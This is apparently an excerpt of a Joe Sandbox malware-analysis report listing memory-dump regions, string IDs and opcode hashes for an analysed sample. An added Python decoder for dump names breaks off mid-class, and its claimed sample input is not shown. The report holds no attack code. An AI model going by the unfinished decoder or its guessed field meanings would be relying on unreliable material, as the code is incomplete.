                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?$__ZN
                                        • API String ID: 0-1427190319
                                        • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction ID: ffa33492599a692c747ae1285b144cc7f8aacd9651c35b5594e3ab7ed69a86da
                                        • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction Fuzzy Hash: E27234B3908B118BD714DF14C88066ABBE2FFC5310F599A1EF4AD6B291DB70DC419B82
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2+f|$QMG
                                        • API String ID: 0-199657408
                                        • Opcode ID: 4a5a74f2a473fb63619bafef6e0e10161e540a92f1c4aa8b8ecc6010e19f97fa
                                        • Instruction ID: 2a482a71dd36db7f6aec2fd33856fc7dcdcf5af80d03abe82fbe9c307a9bcfef
                                        • Opcode Fuzzy Hash: 4a5a74f2a473fb63619bafef6e0e10161e540a92f1c4aa8b8ecc6010e19f97fa
                                        • Instruction Fuzzy Hash: C05228F360C2009FE3086E2DEC8567AFBE9EF94720F16893DE6C487744EA3558458697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: xn--
                                        • API String ID: 0-2826155999
                                        • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction ID: 309257308875b171eda0e5f90f139482ab6db9d10abd086417f0b14587dd48f3
                                        • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction Fuzzy Hash: 24A247B1D602688AEF28CF68E8503FDBBB1FF45384F1852AAD4567B281D7355E81CB50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction ID: 26fed101819f40b2604d5953c88a935eb80e5b969884cb54dc7552e08344fd2c
                                        • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction Fuzzy Hash: DBE100327483419FC724CF28D8907AFB7E2EF89344F456A2DE4D9AB291D7319845CB82
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction ID: b90f4eb67617eb0ed0b43582b753ca839e3cd3f7a5f258250f0a5ebcb56d140c
                                        • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction Fuzzy Hash: 30E1E5B1A483019FCB24CE18D8817AEB7E2EFC5354F15992DE899A7391D730EC45CB46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: UNC\
                                        • API String ID: 0-505053535
                                        • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction ID: fc4f91d4ba2c93e322ebe490d1f262ada4db39ed2d880f2493be59584a9b40d7
                                        • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction Fuzzy Hash: 40E11971D042658EEB10CF58C8843BEBBE2AB89318F19D1E9D46C7B392D7358D46CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: FF=c
                                        • API String ID: 0-1434407379
                                        • Opcode ID: b02bb50277b0c4a6962b928e566efd151d436dbc0d1702070baeb0c4b9f9df17
                                        • Instruction ID: 99b8145e424b79b97e55e7a1b9a42a0057b18f4dd5902bac47615e19a2a961f0
                                        • Opcode Fuzzy Hash: b02bb50277b0c4a6962b928e566efd151d436dbc0d1702070baeb0c4b9f9df17
                                        • Instruction Fuzzy Hash: A97135F3A183089BE304BE6DEC8576ABBD5DB94720F1A463DEBD4C7780F97558008686
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: m8[}
                                        • API String ID: 0-3045838324
                                        • Opcode ID: 3411ffde822d258ee4487d76a425a2dffa1874f317eae160048d746c24390a24
                                        • Instruction ID: fd9156b0c59ade7304e1dd6d3f1c3380cdff2e4007e3ab4db53358775acda3cf
                                        • Opcode Fuzzy Hash: 3411ffde822d258ee4487d76a425a2dffa1874f317eae160048d746c24390a24
                                        • Instruction Fuzzy Hash: 7C7128F3A083089BE3046E2DEC8576BFBD9EB94710F2A463DEBC493740E97559018696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: o{
                                        • API String ID: 0-3564278927
                                        • Opcode ID: 0dc107ea745e300603a736d52b9630a62654d9a5f13a868cd17c43d0ab9cda98
                                        • Instruction ID: 4a71939fd3e8806645807f9bdbfb7844d736ff8588f28ee9d6101f6a1f691931
                                        • Opcode Fuzzy Hash: 0dc107ea745e300603a736d52b9630a62654d9a5f13a868cd17c43d0ab9cda98
                                        • Instruction Fuzzy Hash: 7861E8F3A1D2049FE3096E29DC8577AF7E6EF94310F1B093DD6C597380EA3968048696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: R7|
                                        • API String ID: 0-455341821
                                        • Opcode ID: 6dc6536a92db3d77731ef1b6bd937412382c8d40e1f053ae8aadd5b4c7263ed2
                                        • Instruction ID: e1571a217a8241cb365d52181d523853d264aa15815594b37c792d5bfbc0d461
                                        • Opcode Fuzzy Hash: 6dc6536a92db3d77731ef1b6bd937412382c8d40e1f053ae8aadd5b4c7263ed2
                                        • Instruction Fuzzy Hash: 12513BF3B596045FF3082919FC857BAB79AEBD4320F5A463DEA84C3780E93D98054296
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: sY_^
                                        • API String ID: 0-2320758841
                                        • Opcode ID: 0e8ee0e724b1559c3ab82af62cf514879b40c165d1897808cea1098482a1a7b3
                                        • Instruction ID: c83e41697394234d43da809b74ce227ca355cbcf1c496daa00b0d13ea004e5c9
                                        • Opcode Fuzzy Hash: 0e8ee0e724b1559c3ab82af62cf514879b40c165d1897808cea1098482a1a7b3
                                        • Instruction Fuzzy Hash: B64136F3A182045FE7007A6DEC8977AB7D5EB94320F0E463DEA84C7744F9359908869A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: b^
                                        • API String ID: 0-3065037073
                                        • Opcode ID: 85aee35ed3c4e2042c2c98446ff6ac7f87a96420fa74165a16ae4014d2effb74
                                        • Instruction ID: ed0e90a1e181abd378b86219a6ad5a84e21fec3893e124c85d14657fcdb35fb9
                                        • Opcode Fuzzy Hash: 85aee35ed3c4e2042c2c98446ff6ac7f87a96420fa74165a16ae4014d2effb74
                                        • Instruction Fuzzy Hash: 8031F2B290C3088FD340BE2DDC8176AF7E9FFA8210F06493C96C983700EA71A90186D7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction ID: 3135ee54892b0f5f38d32e3887850627a59b0bae06192ce0b7ce25de921849e1
                                        • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                        • Instruction Fuzzy Hash: F9820175900F448FD365CF29C884B92BBF1BF8A300F509A2ED9EA9B752DB30A545CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction ID: 4fbdc153b45dc97849b38fdea0c32625f9f92fdbce95df9c03f0ad79cf854525
                                        • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction Fuzzy Hash: 6642AF70604741CFC725CF19C0906A5BBE2BF89316F289E6ECC869B792D675E88DCB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction ID: 2d29add85c357dde980020072116d3748d0998b7f83cac279a42d6edd53e2c74
                                        • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction Fuzzy Hash: 03020771E002168FDB11DF69C8806BFB7E2AF9A344F19932AE81DB7251D770AD8187D0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction ID: 5b83e05b0fbe422e752929c19bf48ed7b66f0f7e44f25322c989e82de4434506
                                        • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction Fuzzy Hash: E8021270A483058FCB15CF29E880369B7E9EFE5394F14972DE899AB352D731E885CB41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8efae6540d4994eeec831f08619b4e9b8055b92166caa3aace5c2e4e29003137
                                        • Instruction ID: 5976dfa732bb9e946e56089243ccbb0d264814850020ea8a8d456a266189c60f
                                        • Opcode Fuzzy Hash: 8efae6540d4994eeec831f08619b4e9b8055b92166caa3aace5c2e4e29003137
                                        • Instruction Fuzzy Hash: E0E1F171E002098BDF24DF68CC806EEB7F5EF89310F149229E96DB7391D734994A8B91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
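Added example, not part of the Joe Sandbox report or of the analysed sample: a small Python decoder for the *.sdmp names listed under Memory Dump Source. The eight-field layout is inferred from the names on this page; the PAGE_* and MEM_* values are the winnt.h constants, while the labels given to the process-index, dump-stage, dump-id and module-index fields are this example's own assumptions. The sample input is a subset of this entry's own lines, copied as scraped (with the "Download File" link text still glued on). It answers the question an analyst asks of such a list: which dumps are both writable and executable, and so are the first candidates for unpacked code, and which are not.

```python
"""Decode Joe Sandbox memory-dump names (the *.sdmp entries under "Memory Dump
Source") and flag the regions worth pulling first.

Field layout is inferred from the names on this page, not from Joe Sandbox
documentation; labels marked (assumed) are this example's own guesses:
  0 process index (assumed)   1 dump stage (assumed)   2 dump id, kept as text (assumed)
  3 base address (the report's "Offset")   4 page protection (winnt.h PAGE_*)
  5 flags, meaning unknown   6 region type (winnt.h MEM_*)   7 module index (assumed)
"""
import re
from dataclasses import dataclass

# winnt.h protection values (low byte of the field) and region types.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80
# Eight dot-separated hex fields plus ".sdmp"; no trailing \b, so a name glued to
# link text in a scraped report ("...sdmpDownload File") still matches.
DUMP_NAME_RE = re.compile(r"(?:[0-9A-Fa-f]+\.){8}sdmp")


@dataclass(frozen=True)
class DumpName:
    process_index: int
    stage: int
    dump_id: str
    base: int
    protect: int
    flags: int
    mem_type: int
    module_index: int

    @property
    def protection(self) -> str:
        low = self.protect & 0xFF  # PAGE_GUARD and friends live above the low byte
        return PAGE_PROTECT.get(low, f"0x{low:x}")

    @property
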